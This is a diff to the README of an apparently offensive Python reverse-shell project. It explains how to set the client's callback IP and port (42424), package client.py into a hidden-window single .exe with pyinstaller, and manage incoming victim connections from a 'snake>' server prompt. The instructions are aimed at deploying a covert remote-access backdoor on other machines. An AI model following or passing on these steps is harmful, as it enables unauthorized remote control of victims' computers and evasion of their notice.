ofer026/Python-Reverse-Shell/README.md

 ## Client
 make sure that you have you public IP address there on `s.connect((%PUBLIC IP ADDRESS%, 42424))`
+## Conver client.py to .exe
+type in the terminal `pyinstaller -w --onefile "Multiple Clients/client.py"`. then you can delete the .spec file and the build folder. the exe will be in "dist" folder.
+\n
 ## Using the tool
 start server.py and wait for connection. to see of all your connections type `snake> list` in the interacive prompt.